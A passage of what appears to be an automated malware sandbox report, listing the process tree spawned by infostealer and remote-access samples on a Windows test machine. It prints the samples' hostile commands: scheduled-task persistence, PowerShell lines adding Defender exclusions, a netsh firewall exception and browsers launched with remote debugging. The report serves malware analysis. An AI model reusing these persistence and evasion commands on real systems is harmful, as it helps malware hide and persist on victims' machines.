        31⤵
        
        PID:2020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:3980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:112
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        32⤵
        
        PID:5668
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        33⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\muC2QJMs7mC3.bat" "
        33⤵
        
        PID:6732
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:5760
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6352
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        34⤵
        
        PID:5416
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        35⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yjpcP2hdvS0J.bat" "
        35⤵
        
        PID:6036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:6700
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5956
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        36⤵
        
        PID:5488
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        37⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YXQRAZdWe38u.bat" "
        37⤵
        
        PID:5832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:3824
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3648
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        38⤵
        
        PID:6060
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        39⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T8uEbdxcWGYh.bat" "
        39⤵
        
        PID:7112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:5664
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        40⤵
        
        PID:3168
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        41⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j5r43egAczx2.bat" "
        41⤵
        
        PID:5764
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:2856
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5508
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        42⤵
        
        PID:4992
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        43⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ncDotJ4YNEBU.bat" "
        43⤵
        
        PID:4956
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:5060
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7848
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        44⤵
        
        PID:4692
- - C:\Users\Admin\Desktop\Files\TPB-1.exe
    "C:\Users\Admin\Desktop\Files\TPB-1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:6964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:5112
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ff9f44acc40,0x7ff9f44acc4c,0x7ff9f44acc58
        5⤵
        
        PID:5456
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
        5⤵
        
        PID:2276
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:3
        5⤵
        
        PID:3936
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
        5⤵
        
        PID:5852
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:684
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4620 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3516
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,3634479614518038800,12322154041632436822,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:8
        5⤵
        
        PID:5520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6604
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9f51646f8,0x7ff9f5164708,0x7ff9f5164718
        5⤵
        
        PID:5564
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
        5⤵
        
        PID:5156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
        5⤵
        
        PID:5516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --lang=uk --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
        5⤵
        
        PID:5772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6352
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
        5⤵
        
        PID:4712
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6308
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1996 /prefetch:2
        5⤵
        
        PID:5792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2516 /prefetch:2
        5⤵
        
        PID:6384
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4768 /prefetch:2
        5⤵
        
        PID:1624
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2400 /prefetch:2
        5⤵
        
        PID:5540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15576066423422630719,5533917058663761082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4696 /prefetch:2
        5⤵
        
        PID:5664
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 1660
      4⤵
      Program crash
      PID:972
- - C:\Users\Admin\Desktop\Files\Server1.exe
    "C:\Users\Admin\Desktop\Files\Server1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3016
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\Server1.exe" "Server1.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:7076
- - C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe
    "C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
    3⤵
    PID:6156
  - - C:\Users\Admin\AppData\Local\Temp\is-28K64.tmp\SrbijaSetupHokej.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-28K64.tmp\SrbijaSetupHokej.tmp" /SL5="$904B8,3939740,937984,C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
      4⤵
      PID:3200
    - - C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe
        
        "C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"
        5⤵
        
        PID:6652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 1312
        6⤵
        Program crash
        
        PID:524
- - C:\Users\Admin\Desktop\Files\XClient.exe
    "C:\Users\Admin\Desktop\Files\XClient.exe"
    3⤵
    PID:5156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7016
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5704
- - C:\Users\Admin\Desktop\Files\LummaC222222.exe
    "C:\Users\Admin\Desktop\Files\LummaC222222.exe"
    3⤵
    PID:4172
- - C:\Users\Admin\Desktop\Files\stealc_default.exe
    "C:\Users\Admin\Desktop\Files\stealc_default.exe"
    3⤵
    PID:4596
- - C:\Users\Admin\Desktop\Files\Statement-415322024.exe
    "C:\Users\Admin\Desktop\Files\Statement-415322024.exe"
    3⤵
    PID:2820
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 996
      4⤵
      Program crash
      PID:5204
- - C:\Users\Admin\Desktop\Files\keygen.exe
    "C:\Users\Admin\Desktop\Files\keygen.exe"
    3⤵
    PID:7084
- - C:\Users\Admin\Desktop\Files\ZinTask.exe
    "C:\Users\Admin\Desktop\Files\ZinTask.exe"
    3⤵
    PID:1720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 232
      4⤵
      Program crash
      PID:5372
- - C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe
    "C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe"
    3⤵
    PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\is-3V1D4.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-3V1D4.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$1705A6,3652845,825344,C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe"
      4⤵
      PID:6860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:416
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5436
      - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrpc
        6⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrpc
        7⤵
        
        PID:3204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c net stop tacticalagent
        5⤵
        
        PID:3984
      - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalagent
        6⤵
        
        PID:6308
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalagent
        7⤵
        
        PID:5420
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3484
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1752
      - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrmm
        6⤵
        
        PID:6896
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrmm
        7⤵
        
        PID:5340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
        5⤵
        
        PID:4356
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM tacticalrmm.exe
        6⤵
        Kills process with taskkill
        
        PID:6028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c sc delete tacticalagent
        5⤵
        
        PID:5840
      - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalagent
        6⤵
        Launches sc.exe
        
        PID:1376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c sc delete tacticalrpc
        5⤵
        
        PID:616
      - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalrpc
        6⤵
        Launches sc.exe
        
        PID:768
    - - C:\Program Files\TacticalAgent\tacticalrmm.exe
        
        "C:\Program Files\TacticalAgent\tacticalrmm.exe"
        5⤵
        
        PID:6136
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c tacticalrmm.exe -m installsvc
        5⤵
        
        PID:5836
      - C:\Program Files\TacticalAgent\tacticalrmm.exe
        
        tacticalrmm.exe -m installsvc
        6⤵
        
        PID:5576
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c net start tacticalrmm
        5⤵
        
        PID:5832
      - C:\Windows\SysWOW64\net.exe
        
        net start tacticalrmm
        6⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start tacticalrmm
        7⤵
        
        PID:540
- - C:\Users\Admin\Desktop\Files\c1.exe
    "C:\Users\Admin\Desktop\Files\c1.exe"
    3⤵
    PID:6068
- - C:\Users\Admin\Desktop\Files\Xworm%20V5.6.exe
    "C:\Users\Admin\Desktop\Files\Xworm%20V5.6.exe"
    3⤵
    PID:5340
- - C:\Users\Admin\Desktop\Files\BeamNG.UI.exe
    "C:\Users\Admin\Desktop\Files\BeamNG.UI.exe"
    3⤵
    PID:6056
- - C:\Users\Admin\Desktop\Files\EakLauncher.exe
    "C:\Users\Admin\Desktop\Files\EakLauncher.exe"
    3⤵
    PID:6752
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/rsM4AgvAhn
      4⤵
      PID:2940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9f3d646f8,0x7ff9f3d64708,0x7ff9f3d64718
        5⤵
        
        PID:5292
